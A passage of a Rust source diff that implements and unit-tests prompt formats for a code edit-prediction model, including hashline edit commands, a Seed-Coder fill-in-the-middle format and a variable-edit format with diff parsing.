+ let mut cursor_line_offset = None; + if let Some(cursor_off) = cursor_offset + && (first_hunk + || cursor_off >= new_text_byte_offset + && cursor_off <= new_text_byte_offset + added_content.len()) + { + let line_offset = added_content.floor_char_boundary( + cursor_off + .saturating_sub(new_text_byte_offset) + .min(added_content.len()), + ); + cursor_line_offset = Some(line_offset); + } + + new_text_byte_offset += added_content.len(); + + let hunk = current_hunk.get_or_insert(Hunk { + line_range: old_line_index..old_line_index, + new_text_lines: vec![], + cursor_line_offset_in_new_text: None, + }); + hunk.new_text_lines.push(added_content); + hunk.cursor_line_offset_in_new_text = cursor_line_offset + .map(|offset_in_line| (hunk.new_text_lines.len() - 1, offset_in_line)); + } else { + // Context line (starts with ' ' or is empty). + if let Some(hunk) = current_hunk.take() { + flush_hunk(hunk, last_old_line_before_hunk, &mut result, &old_hashes); + } + last_old_line_before_hunk = Some(old_line_index); + old_line_index += 1; + let content = raw_line.strip_prefix(' ').unwrap_or(raw_line); + new_text_byte_offset += content.len(); + } + } + + // Flush final group. + if let Some(hunk) = current_hunk.take() { + flush_hunk(hunk, last_old_line_before_hunk, &mut result, &old_hashes); + } + + // Trim a single trailing newline. + if result.ends_with('\n') { + result.pop(); + } + + if result.is_empty() { + return Ok(NO_EDITS_COMMAND_MARKER.to_string()); + } + + Ok(result) + } + + #[cfg(test)] + mod tests { + use super::*; + use indoc::indoc; + + #[test] + fn test_format_cursor_region() { + struct Case { + name: &'static str, + context: &'static str, + editable_range: Range, + cursor_offset: usize, + expected: &'static str, + } + + let cases = [ + Case { + name: "basic_cursor_placement", + context: "hello world\n", + editable_range: 0..12, + cursor_offset: 5, + expected: indoc! 
{" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:5c|hello<|user_cursor|> world + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "multiline_cursor_on_second_line", + context: "aaa\nbbb\nccc\n", + editable_range: 0..12, + cursor_offset: 5, // byte 5 → 1 byte into "bbb" + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:23|aaa + 1:26|b<|user_cursor|>bb + 2:29|ccc + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "no_trailing_newline_in_context", + context: "line1\nline2", + editable_range: 0..11, + cursor_offset: 3, + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:d9|lin<|user_cursor|>e1 + 1:da|line2 + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "leading_newline_in_editable_region", + context: "\nabc\n", + editable_range: 0..5, + cursor_offset: 2, // byte 2 = 'a' in "abc" (after leading \n) + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:00| + 1:26|a<|user_cursor|>bc + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "with_suffix", + context: "abc\ndef", + editable_range: 0..4, // editable region = "abc\n", suffix = "def" + cursor_offset: 2, + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:26|ab<|user_cursor|>c + <|fim_suffix|> + def + <|fim_middle|>updated + "}, + }, + Case { + name: "unicode_two_byte_chars", + context: "héllo\n", + editable_range: 0..7, + cursor_offset: 3, // byte 3 = after "hé" (h=1 byte, é=2 bytes), before "llo" + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:1b|hé<|user_cursor|>llo + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "unicode_three_byte_chars", + context: "日本語\n", + editable_range: 0..10, + cursor_offset: 6, // byte 6 = after "日本" (3+3 bytes), before "語" + expected: indoc! 
{" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:80|日本<|user_cursor|>語 + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "unicode_four_byte_chars", + context: "a🌍b\n", + editable_range: 0..7, + cursor_offset: 5, // byte 5 = after "a🌍" (1+4 bytes), before "b" + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:6b|a🌍<|user_cursor|>b + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "cursor_at_start_of_region_not_placed", + context: "abc\n", + editable_range: 0..4, + cursor_offset: 0, // cursor_offset(0) > offset(0) is false → cursor not placed + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:26|abc + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "cursor_at_end_of_line_not_placed", + context: "abc\ndef\n", + editable_range: 0..8, + cursor_offset: 3, // byte 3 = the \n after "abc" → falls between lines, not placed + expected: indoc! {" + <|file_sep|>test.rs + <|fim_prefix|> + <|fim_middle|>current + 0:26|abc + 1:2f|def + <|fim_suffix|> + <|fim_middle|>updated + "}, + }, + Case { + name: "cursor_offset_relative_to_context_not_editable_region", + // cursor_offset is relative to `context`, so when editable_range.start > 0, + // write_cursor_excerpt_section must subtract it before comparing against + // per-line offsets within the editable region. + context: "pre\naaa\nbbb\nsuf\n", + editable_range: 4..12, // editable region = "aaa\nbbb\n" + cursor_offset: 9, // byte 9 in context = second 'b' in "bbb" + expected: indoc! 
{" + <|file_sep|>test.rs + <|fim_prefix|> + pre + <|fim_middle|>current + 0:23|aaa + 1:26|b<|user_cursor|>bb + <|fim_suffix|> + suf + <|fim_middle|>updated + "}, + }, + ]; + + for case in &cases { + let mut prompt = String::new(); + hashline::write_cursor_excerpt_section( + &mut prompt, + Path::new("test.rs"), + case.context, + &case.editable_range, + case.cursor_offset, + ); + assert_eq!(prompt, case.expected, "failed case: {}", case.name); + } + } + + #[test] + fn test_apply_edit_commands() { + struct Case { + name: &'static str, + original: &'static str, + model_output: &'static str, + expected: &'static str, + } + + let cases = vec![ + Case { + name: "set_single_line", + original: indoc! {" + let mut total = 0; + for product in products { + total += ; + } + total + "}, + model_output: indoc! {" + <|set|>2:87 + total += product.price; + "}, + expected: indoc! {" + let mut total = 0; + for product in products { + total += product.price; + } + total + "}, + }, + Case { + name: "set_range", + original: indoc! {" + fn foo() { + let x = 1; + let y = 2; + let z = 3; + } + "}, + model_output: indoc! {" + <|set|>1:46-3:4a + let sum = 6; + "}, + expected: indoc! {" + fn foo() { + let sum = 6; + } + "}, + }, + Case { + name: "insert_after_line", + original: indoc! {" + fn main() { + let x = 1; + } + "}, + model_output: indoc! {" + <|insert|>1:46 + let y = 2; + "}, + expected: indoc! {" + fn main() { + let x = 1; + let y = 2; + } + "}, + }, + Case { + name: "insert_before_first", + original: indoc! {" + let x = 1; + let y = 2; + "}, + model_output: indoc! {" + <|insert|> + use std::io; + "}, + expected: indoc! {" + use std::io; + let x = 1; + let y = 2; + "}, + }, + Case { + name: "set_with_cursor_marker", + original: indoc! {" + fn main() { + println!(); + } + "}, + model_output: indoc! {" + <|set|>1:34 + eprintln!(\"<|user_cursor|>\"); + "}, + expected: indoc! 
{" + fn main() { + eprintln!(\"<|user_cursor|>\"); + } + "}, + }, + Case { + name: "multiple_set_commands", + original: indoc! {" + aaa + bbb + ccc + ddd + "}, + model_output: indoc! {" + <|set|>0:23 + AAA + <|set|>2:29 + CCC + "}, + expected: indoc! {" + AAA + bbb + CCC + ddd + "}, + }, + Case { + name: "set_range_multiline_replacement", + original: indoc! {" + fn handle_submit() { + } + + fn handle_keystroke() { + "}, + model_output: indoc! {" + <|set|>0:3f-1:7d + fn handle_submit(modal_state: &mut ModalState) { + <|user_cursor|> + } + "}, + expected: indoc! {" + fn handle_submit(modal_state: &mut ModalState) { + <|user_cursor|> + } + + fn handle_keystroke() { + "}, + }, + Case { + name: "no_edit_commands_returns_original", + original: indoc! {" + hello + world + "}, + model_output: "some random text with no commands", + expected: indoc! {" + hello + world + "}, + }, + Case { + name: "no_edits_command_returns_original", + original: indoc! {" + hello + world + "}, + model_output: "<|no_edits|>", + expected: indoc! {" + hello + world + "}, + }, + Case { + name: "wrong_hash_set_ignored", + original: indoc! {" + aaa + bbb + "}, + model_output: indoc! {" + <|set|>0:ff + ZZZ + "}, + expected: indoc! {" + aaa + bbb + "}, + }, + Case { + name: "insert_and_set_combined", + original: indoc! {" + alpha + beta + gamma + "}, + model_output: indoc! {" + <|set|>0:06 + ALPHA + <|insert|>1:9c + beta_extra + "}, + expected: indoc! {" + ALPHA + beta + beta_extra + gamma + "}, + }, + Case { + name: "no_trailing_newline_preserved", + original: "hello\nworld", + model_output: indoc! {" + <|set|>0:14 + HELLO + "}, + expected: "HELLO\nworld", + }, + Case { + name: "set_range_hash_mismatch_in_end_bound", + original: indoc! {" + one + two + three + "}, + model_output: indoc! {" + <|set|>0:42-2:ff + ONE_TWO_THREE + "}, + expected: indoc! {" + one + two + three + "}, + }, + Case { + name: "set_range_start_greater_than_end_ignored", + original: indoc! 
{" + a + b + c + "}, + model_output: indoc! {" + <|set|>2:63-1:62 + X + "}, + expected: indoc! {" + a + b + c + "}, + }, + Case { + name: "insert_out_of_bounds_ignored", + original: indoc! {" + x + y + "}, + model_output: indoc! {" + <|insert|>99:aa + z + "}, + expected: indoc! {" + x + y + "}, + }, + Case { + name: "set_out_of_bounds_ignored", + original: indoc! {" + x + y + "}, + model_output: indoc! {" + <|set|>99:aa + z + "}, + expected: indoc! {" + x + y + "}, + }, + Case { + name: "malformed_set_command_ignored", + original: indoc! {" + alpha + beta + "}, + model_output: indoc! {" + <|set|>not-a-line-ref + UPDATED + "}, + expected: indoc! {" + alpha + beta + "}, + }, + Case { + name: "malformed_insert_hash_treated_as_before_first", + original: indoc! {" + alpha + beta + "}, + model_output: indoc! {" + <|insert|>1:nothex + preamble + "}, + expected: indoc! {" + preamble + alpha + beta + "}, + }, + Case { + name: "set_then_insert_same_target_orders_insert_after_replacement", + original: indoc! {" + cat + dog + "}, + model_output: indoc! {" + <|set|>0:38 + CAT + <|insert|>0:38 + TAIL + "}, + expected: indoc! {" + CAT + TAIL + dog + "}, + }, + Case { + name: "overlapping_set_ranges_last_wins", + original: indoc! {" + a + b + c + d + "}, + model_output: indoc! {" + <|set|>0:61-2:63 + FIRST + <|set|>1:62-3:64 + SECOND + "}, + expected: indoc! {" + FIRST + d + "}, + }, + Case { + name: "insert_before_first_and_after_line", + original: indoc! {" + a + b + "}, + model_output: indoc! {" + <|insert|> + HEAD + <|insert|>0:61 + MID + "}, + expected: indoc! 
{" + HEAD + a + MID + b + "}, + }, + ]; + + for case in &cases { + let result = hashline::apply_edit_commands(case.original, &case.model_output); + assert_eq!(result, case.expected, "failed case: {}", case.name); + } + } + + #[test] + fn test_output_has_edit_commands() { + assert!(hashline::output_has_edit_commands(&format!( + "{}0:ab\nnew", + SET_COMMAND_MARKER + ))); + assert!(hashline::output_has_edit_commands(&format!( + "{}0:ab\nnew", + INSERT_COMMAND_MARKER + ))); + assert!(hashline::output_has_edit_commands(&format!( + "some text\n{}1:cd\nstuff", + SET_COMMAND_MARKER + ))); + assert!(!hashline::output_has_edit_commands("just plain text")); + assert!(!hashline::output_has_edit_commands("NO_EDITS")); + assert!(hashline::output_has_edit_commands("<|no_edits|>")); + } + + // ---- hashline::patch_to_edit_commands round-trip tests ---- + + #[test] + fn test_patch_to_edit_commands() { + struct Case { + name: &'static str, + old: &'static str, + patch: &'static str, + expected_new: &'static str, + } + + let cases = [ + Case { + name: "single_line_replacement", + old: indoc! {" + let mut total = 0; + for product in products { + total += ; + } + total + "}, + patch: indoc! {" + @@ -1,5 +1,5 @@ + let mut total = 0; + for product in products { + - total += ; + + total += product.price; + } + total + "}, + expected_new: indoc! {" + let mut total = 0; + for product in products { + total += product.price; + } + total + "}, + }, + Case { + name: "multiline_replacement", + old: indoc! {" + fn foo() { + let x = 1; + let y = 2; + let z = 3; + } + "}, + patch: indoc! {" + @@ -1,5 +1,3 @@ + fn foo() { + - let x = 1; + - let y = 2; + - let z = 3; + + let sum = 1 + 2 + 3; + } + "}, + expected_new: indoc! {" + fn foo() { + let sum = 1 + 2 + 3; + } + "}, + }, + Case { + name: "insertion", + old: indoc! {" + fn main() { + let x = 1; + } + "}, + patch: indoc! {" + @@ -1,3 +1,4 @@ + fn main() { + let x = 1; + + let y = 2; + } + "}, + expected_new: indoc! 
{" + fn main() { + let x = 1; + let y = 2; + } + "}, + }, + Case { + name: "insertion_before_first", + old: indoc! {" + let x = 1; + let y = 2; + "}, + patch: indoc! {" + @@ -1,2 +1,3 @@ + +use std::io; + let x = 1; + let y = 2; + "}, + expected_new: indoc! {" + use std::io; + let x = 1; + let y = 2; + "}, + }, + Case { + name: "deletion", + old: indoc! {" + aaa + bbb + ccc + ddd + "}, + patch: indoc! {" + @@ -1,4 +1,2 @@ + aaa + -bbb + -ccc + ddd + "}, + expected_new: indoc! {" + aaa + ddd + "}, + }, + Case { + name: "multiple_changes", + old: indoc! {" + alpha + beta + gamma + delta + epsilon + "}, + patch: indoc! {" + @@ -1,5 +1,5 @@ + -alpha + +ALPHA + beta + gamma + -delta + +DELTA + epsilon + "}, + expected_new: indoc! {" + ALPHA + beta + gamma + DELTA + epsilon + "}, + }, + Case { + name: "replace_with_insertion", + old: indoc! {r#" + fn handle() { + modal_state.close(); + modal_state.dismiss(); + "#}, + patch: indoc! {r#" + @@ -1,3 +1,4 @@ + fn handle() { + modal_state.close(); + + eprintln!(""); + modal_state.dismiss(); + "#}, + expected_new: indoc! {r#" + fn handle() { + modal_state.close(); + eprintln!(""); + modal_state.dismiss(); + "#}, + }, + Case { + name: "complete_replacement", + old: indoc! {" + aaa + bbb + ccc + "}, + patch: indoc! {" + @@ -1,3 +1,3 @@ + -aaa + -bbb + -ccc + +xxx + +yyy + +zzz + "}, + expected_new: indoc! {" + xxx + yyy + zzz + "}, + }, + Case { + name: "add_function_body", + old: indoc! {" + fn foo() { + modal_state.dismiss(); + } + + fn + + fn handle_keystroke() { + "}, + patch: indoc! {" + @@ -1,6 +1,8 @@ + fn foo() { + modal_state.dismiss(); + } + + -fn + +fn handle_submit() { + + todo() + +} + + fn handle_keystroke() { + "}, + expected_new: indoc! {" + fn foo() { + modal_state.dismiss(); + } + + fn handle_submit() { + todo() + } + + fn handle_keystroke() { + "}, + }, + Case { + name: "with_cursor_offset", + old: indoc! {r#" + fn main() { + println!(); + } + "#}, + patch: indoc! 
{r#" + @@ -1,3 +1,3 @@ + fn main() { + - println!(); + + eprintln!(""); + } + "#}, + expected_new: indoc! {r#" + fn main() { + eprintln!("<|user_cursor|>"); + } + "#}, + }, + Case { + name: "non_local_hunk_header_pure_insertion_repro", + old: indoc! {" + aaa + bbb + "}, + patch: indoc! {" + @@ -20,2 +20,3 @@ + aaa + +xxx + bbb + "}, + expected_new: indoc! {" + aaa + xxx + bbb + "}, + }, + Case { + name: "empty_patch_produces_no_edits_marker", + old: indoc! {" + aaa + bbb + "}, + patch: "@@ -20,2 +20,3 @@\n", + expected_new: indoc! {" + aaa + bbb + "}, + }, + ]; + + for case in &cases { + // The cursor_offset for patch_to_edit_commands is relative to + // the first hunk's new text (context + additions). We compute + // it by finding where the marker sits in the expected output + // (which mirrors the new text of the hunk). + let cursor_offset = case.expected_new.find(CURSOR_MARKER); + + let commands = + hashline::patch_to_edit_commands(case.old, case.patch, cursor_offset) + .unwrap_or_else(|e| panic!("failed case {}: {e}", case.name)); + + assert!( + hashline::output_has_edit_commands(&commands), + "case {}: expected edit commands, got: {commands:?}", + case.name, + ); + + let applied = hashline::apply_edit_commands(case.old, &commands); + assert_eq!(applied, case.expected_new, "case {}", case.name); + } + } + } +} + +pub mod seed_coder { + //! Seed-Coder prompt format using SPM (Suffix-Prefix-Middle) FIM mode. + //! + //! Seed-Coder uses different FIM tokens and order than Qwen: + //! - SPM order: suffix comes FIRST, then prefix, then middle + //! - Tokens: `<[fim-suffix]>`, `<[fim-prefix]>`, `<[fim-middle]>` + //! - File markers: StarCoder-style `path` (single token + path) + //! + //! All context (related files, edit history) goes in the PREFIX section. + //! The suffix contains only code after the editable region. + //! + //! Example prompt: + //! + //! <[fim-suffix]> + //! code after editable region + //! <[fim-prefix]>related/file.py + //! 
related file content + //! + //! edit_history + //! --- a/some_file.py + //! +++ b/some_file.py + //! -old + //! +new + //! + //! path/to/target_file.py + //! code before editable region + //! <<<<<<< CURRENT + //! code that + //! needs to<|user_cursor|> + //! be rewritten + //! ======= + //! <[fim-middle]> + //! + //! Expected output (model generates): + //! + //! updated + //! code with + //! changes applied + //! >>>>>>> UPDATED + + use super::*; + + pub const FIM_SUFFIX: &str = "<[fim-suffix]>"; + pub const FIM_PREFIX: &str = "<[fim-prefix]>"; + pub const FIM_MIDDLE: &str = "<[fim-middle]>"; + pub const FILE_MARKER: &str = ""; + + pub const START_MARKER: &str = "<<<<<<< CURRENT\n"; + pub const SEPARATOR: &str = "=======\n"; + pub const END_MARKER: &str = ">>>>>>> UPDATED\n"; + + pub const NO_EDITS: &str = "NO_EDITS\n"; + + pub fn special_tokens() -> &'static [&'static str] { + &[ + FIM_SUFFIX, + FIM_PREFIX, + FIM_MIDDLE, + FILE_MARKER, + START_MARKER, + SEPARATOR, + END_MARKER, + CURSOR_MARKER, + ] + } + + pub fn write_cursor_excerpt_section( + prompt: &mut String, + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, + ) { + let section = build_cursor_prefix_section(path, context, editable_range, cursor_offset); + prompt.push_str(§ion); + } + + pub fn format_prompt_with_budget( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, + events: &[Arc], + related_files: &[RelatedFile], max_tokens: usize, ) -> String { - let suffix_section = build_suffix_section(context, editable_range); let cursor_prefix_section = build_cursor_prefix_section(path, context, editable_range, cursor_offset); + assemble_fim_prompt( + context, + editable_range, + &cursor_prefix_section, + events, + related_files, + max_tokens, + ) + } + + pub fn assemble_fim_prompt( + context: &str, + editable_range: &Range, + cursor_prefix_section: &str, + events: &[Arc], + related_files: &[RelatedFile], + max_tokens: usize, + ) -> String { + let 
suffix_section = build_suffix_section(context, editable_range); + + let suffix_tokens = estimate_tokens(suffix_section.len() + FIM_PREFIX.len()); + let cursor_prefix_tokens = estimate_tokens(cursor_prefix_section.len() + FIM_MIDDLE.len()); + let budget_after_cursor = max_tokens.saturating_sub(suffix_tokens + cursor_prefix_tokens); + + let edit_history_section = super::format_edit_history_within_budget( + events, + FILE_MARKER, + "edit_history", + budget_after_cursor, + max_edit_event_count_for_format(&ZetaFormat::V0211SeedCoder), + ); + let edit_history_tokens = estimate_tokens(edit_history_section.len() + "\n".len()); + let budget_after_edit_history = + budget_after_cursor.saturating_sub(edit_history_tokens + "\n".len()); + + let related_files_section = super::format_related_files_within_budget( + related_files, + FILE_MARKER, + "", + budget_after_edit_history, + ); + + let mut prompt = String::new(); + prompt.push_str(&suffix_section); + prompt.push_str(FIM_PREFIX); + prompt.push_str(&related_files_section); + if !related_files_section.is_empty() { + prompt.push('\n'); + } + prompt.push_str(&edit_history_section); + if !edit_history_section.is_empty() { + prompt.push('\n'); + } + prompt.push_str(cursor_prefix_section); + prompt.push_str(FIM_MIDDLE); + + prompt + } + + fn build_suffix_section(context: &str, editable_range: &Range) -> String { + let mut section = String::new(); + section.push_str(FIM_SUFFIX); + section.push_str(&context[editable_range.end..]); + if !section.ends_with('\n') { + section.push('\n'); + } + section + } + + fn build_cursor_prefix_section( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, + ) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + section.push_str(START_MARKER); + section.push_str(&context[editable_range.start..cursor_offset]); + 
section.push_str(CURSOR_MARKER); + section.push_str(&context[cursor_offset..editable_range.end]); + if !section.ends_with('\n') { + section.push('\n'); + } + section.push_str(SEPARATOR); + section + } + + /// Format patch as containing no changes if it's empty; otherwise return None. + pub(crate) fn no_edits(patch: &str) -> Option { + // Count lines in the patch + let empty_patch = patch.lines().count() <= 3; + if empty_patch { + Some(format!("{NO_EDITS}{END_MARKER}")) + } else { + None + } + } +} + +pub mod v0304_variable_edit { + //! A prompt format with no fixed editable region. The entire context is shown + //! to the model, and it chooses which text to replace by outputting surrounding + //! context lines with `<|fim_middle|>` and `<|fim_suffix|>` delimiting the new + //! text. + //! + //! Example prompt: + //! + //! <|file_sep|>path/to/file.py + //! zero + //! one + //! two + //! three<|user_cursor|> + //! four + //! five + //! <|fim_prefix|> + // + //! Expected output (model generates): + //! + //! two + //! <|fim_middle|> + //! THREE + //! <|fim_suffix|> + //! four + //! + //! The output means: find "two\n...\nfour" in the context, and replace + //! everything between "two\n" and "four" with "THREE\n". + + use super::*; + + pub fn special_tokens() -> &'static [&'static str] { + &[ + "<|fim_prefix|>", + "<|fim_suffix|>", + "<|fim_middle|>", + "<|file_sep|>", + CURSOR_MARKER, + ] + } + + pub fn write_cursor_excerpt_section( + prompt: &mut String, + path: &Path, + context: &str, + cursor_offset: usize, + ) { + let path_str = path.to_string_lossy(); + write!(prompt, "<|file_sep|>{}\n", path_str).ok(); + + prompt.push_str(&context[..cursor_offset]); + prompt.push_str(CURSOR_MARKER); + prompt.push_str(&context[cursor_offset..]); + if !prompt.ends_with('\n') { + prompt.push('\n'); + } + prompt.push_str("<|fim_prefix|>\n") + } + + /// Apply a variable-edit model output to the original context text. 
+ /// + /// The model output has the form: + /// + /// - prefix context lines + /// - `<|fim_middle|>` + /// - new text + /// - `<|fim_suffix|>` + /// - suffix context lines + /// + /// We locate the prefix/suffix context lines in the original text and replace + /// everything between them with the new text. + pub fn apply_variable_edit( + context: &str, + model_output: &str, + ) -> Result<(Range, String)> { + let (prefix_context, rest) = model_output + .split_once("<|fim_middle|>\n") + .or_else(|| model_output.split_once("<|fim_middle|>")) + .ok_or_else(|| anyhow::anyhow!("missing <|fim_middle|> in model output"))?; + + let (new_text, suffix_context) = rest + .split_once("<|fim_suffix|>\n") + .or_else(|| rest.split_once("<|fim_suffix|>")) + .unwrap_or((rest, "")); + + let suffix_context = if prefix_context.is_empty() && !suffix_context.is_empty() { + suffix_context.strip_prefix('\n').unwrap_or(suffix_context) + } else { + suffix_context + }; + + let prefix_offset = find_substring_at_line_boundary(context, prefix_context) + .ok_or_else(|| anyhow!("could not locate prefix lines"))? + + prefix_context.len(); + let suffix_offset = if suffix_context.is_empty() { + context.len() + } else { + find_substring_at_line_boundary(&context[prefix_offset..], suffix_context) + .ok_or_else(|| anyhow!("could not locate suffix lines"))? + + prefix_offset + }; + + let edit_range = prefix_offset..suffix_offset; + return Ok((edit_range, new_text.to_string())); + } + + fn find_substring_at_line_boundary(haystack: &str, needle: &str) -> Option { + if needle.is_empty() { + return Some(0); + } + + haystack.match_indices(needle).find_map(|(offset, _)| { + let matched_line_start = offset == 0 || haystack[..offset].ends_with('\n'); + matched_line_start.then_some(offset) + }) + } + + /// Convert a unified diff patch into the variable-edit output format. 
+ /// + /// Parses `patch` as a unified diff against `old_text` and produces model + /// output with context lines surrounding `<|fim_middle|>` / `<|fim_suffix|>` + /// delimiters. The diff is resolved by content matching rather than line + /// numbers. + pub fn patch_to_variable_edit_output( + old_text: &str, + patch: &str, + cursor_offset: Option, + ) -> Result { + // Parse the unified diff into hunks. Each hunk has an `old_context` + // string (context + deleted lines interleaved in order) and a list of + // edits expressed as byte ranges within that context plus replacement + // text. + let hunks = parse_hunks(patch); + if hunks.is_empty() { + return Ok(String::new()); + } + + // Apply each hunk by finding its old_context in the text and + // performing the edits. We search forward from where the previous + // hunk ended so that hunks are applied in order. + let mut new_text = old_text.to_string(); + let mut search_from: usize = 0; + let mut first_hunk_pos: Option = None; + + for hunk in &hunks { + let context_pos = new_text[search_from..] + .find(&hunk.old_context) + .map(|pos| pos + search_from) + .ok_or_else(|| anyhow::anyhow!("could not locate hunk context in text"))?; + + if first_hunk_pos.is_none() { + first_hunk_pos = Some(context_pos); + } + + // Apply edits in reverse order so byte offsets remain valid. + for edit in hunk.edits.iter().rev() { + let abs_start = context_pos + edit.range.start; + let abs_end = context_pos + edit.range.end; + new_text.replace_range(abs_start..abs_end, &edit.text); + } + + // Advance past this hunk's region in the (now modified) text. + let new_region_len: usize = + hunk.edits.iter().fold(hunk.old_context.len(), |len, edit| { + len + edit.text.len() - (edit.range.end - edit.range.start) + }); + search_from = context_pos + new_region_len; + } + + // Now we have old_text and new_text. Find the changed line range by + // comparing them. 
+ let old_lines: Vec<&str> = old_text.lines().collect(); + let new_lines: Vec<&str> = new_text.lines().collect(); + + // Find first differing line. + let first_changed_row = old_lines + .iter() + .zip(new_lines.iter()) + .position(|(a, b)| a != b) + .unwrap_or_else(|| old_lines.len().min(new_lines.len())); + + // Find last differing line (from the end). + let max_suffix = old_lines.len().min(new_lines.len()) - first_changed_row; + let common_suffix = old_lines + .iter() + .rev() + .zip(new_lines.iter().rev()) + .take(max_suffix) + .take_while(|(a, b)| a == b) + .count(); + + let old_end = old_lines.len() - common_suffix; + let new_end = new_lines.len() - common_suffix; + + if first_changed_row == old_end && first_changed_row == new_end { + return Ok(String::new()); + } - let suffix_tokens = estimate_tokens(suffix_section.len()); - let cursor_prefix_tokens = estimate_tokens(cursor_prefix_section.len()); - let budget_after_cursor = max_tokens.saturating_sub(suffix_tokens + cursor_prefix_tokens); + // Build the replacement text from new_lines[first_diff..new_end]. + let mut merged_new_text = String::new(); + for line in &new_lines[first_changed_row..new_end] { + merged_new_text.push_str(line); + merged_new_text.push('\n'); + } - let edit_history_section = super::format_edit_history_within_budget( - events, - FILE_MARKER, - "edit_history", - budget_after_cursor, - ); - let edit_history_tokens = estimate_tokens(edit_history_section.len()); - let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens); + // cursor_offset is relative to the first hunk's new content in + // new_text. Translate it to an offset within merged_new_text, which + // only contains lines first_diff..new_end of new_text. 
+ if let Some(hunk_offset) = cursor_offset { + let hunk_start = first_hunk_pos.unwrap_or(0); + let absolute_pos = hunk_start + hunk_offset; - let related_files_section = super::format_related_files_within_budget( - related_files, - FILE_MARKER, - "", - budget_after_edit_history, - ); + // Byte offset where first_diff starts in new_text. + let merged_start: usize = new_lines[..first_changed_row] + .iter() + .map(|line| line.len() + 1) + .sum(); - let mut prompt = String::new(); - prompt.push_str(&suffix_section); - prompt.push_str(FIM_PREFIX); - prompt.push_str(&related_files_section); - if !related_files_section.is_empty() { - prompt.push('\n'); + if absolute_pos >= merged_start { + let relative_offset = absolute_pos - merged_start; + if relative_offset <= merged_new_text.len() { + merged_new_text.insert_str(relative_offset, CURSOR_MARKER); + } + } } - prompt.push_str(&edit_history_section); - if !edit_history_section.is_empty() { - prompt.push('\n'); + + // Build output with 2 lines of context above and below. 
+ let context_lines_count = 2; + let mut prefix_start = first_changed_row.saturating_sub(context_lines_count); + let mut suffix_end = (old_end + context_lines_count).min(old_lines.len()); + + fn count_matches(line_range: Range, lines: &[&str]) -> usize { + let pattern = &lines[line_range]; + let pattern_len = pattern.len(); + + let mut count = 0; + for offset in 0..=lines.len() - pattern_len { + if &lines[offset..offset + pattern_len] == pattern { + count += 1; + } + } + count } - prompt.push_str(&cursor_prefix_section); - prompt.push_str(FIM_MIDDLE); - prompt + + // Expand prefix and suffix until they are unique + while prefix_start > 0 { + if count_matches(prefix_start..first_changed_row, &old_lines) > 1 { + prefix_start -= 1; + } else { + break; + } + } + while suffix_end < old_lines.len() { + if count_matches(old_end..suffix_end, &old_lines) > 1 { + suffix_end += 1; + } else { + break; + } + } + + let mut output = String::new(); + for line in &old_lines[prefix_start..first_changed_row] { + output.push_str(line); + output.push('\n'); + } + output.push_str("<|fim_middle|>\n"); + output.push_str(&merged_new_text); + output.push_str("<|fim_suffix|>\n"); + for line in &old_lines[old_end..suffix_end] { + output.push_str(line); + output.push('\n'); + } + + Ok(output) } - fn build_suffix_section(context: &str, editable_range: &Range) -> String { - let mut section = String::new(); - section.push_str(FIM_SUFFIX); - section.push_str(&context[editable_range.end..]); - if !section.ends_with('\n') { - section.push('\n'); + struct ParsedHunk { + old_context: String, + edits: Vec, + } + + struct ParsedEdit { + range: Range, + text: String, + } + + /// Parse a unified diff into content-based hunks. Each hunk contains an + /// `old_context` string (context lines + deleted lines, which together + /// form the text that should be found in the original) and a list of edits + /// expressed as byte ranges within that context. 
+ fn parse_hunks(patch: &str) -> Vec { + let mut hunks = Vec::new(); + let mut current: Option = None; + + for line in patch.lines() { + if line.starts_with("@@") { + if let Some(hunk) = current.take() { + if !hunk.old_context.is_empty() || !hunk.edits.is_empty() { + hunks.push(hunk); + } + } + current = Some(ParsedHunk { + old_context: String::new(), + edits: Vec::new(), + }); + } else if line.starts_with("---") || line.starts_with("+++") { + continue; + } else if let Some(hunk) = &mut current { + if let Some(added) = line.strip_prefix('+') { + let pos = hunk.old_context.len(); + if let Some(last_edit) = hunk.edits.last_mut() { + if last_edit.range.end == pos { + writeln!(&mut last_edit.text, "{added}").ok(); + continue; + } + } + hunk.edits.push(ParsedEdit { + range: pos..pos, + text: format!("{added}\n"), + }); + } else if let Some(removed) = line.strip_prefix('-') { + let start = hunk.old_context.len(); + writeln!(&mut hunk.old_context, "{removed}").ok(); + let end = hunk.old_context.len(); + if let Some(last_edit) = hunk.edits.last_mut() { + if last_edit.range.end == start { + last_edit.range.end = end; + continue; + } + } + hunk.edits.push(ParsedEdit { + range: start..end, + text: String::new(), + }); + } else { + let ctx = line.strip_prefix(' ').unwrap_or(line); + writeln!(&mut hunk.old_context, "{ctx}").ok(); + } + } } - section + + if let Some(hunk) = current { + if !hunk.old_context.is_empty() || !hunk.edits.is_empty() { + hunks.push(hunk); + } + } + + hunks } - fn build_cursor_prefix_section( - path: &Path, - context: &str, - editable_range: &Range, - 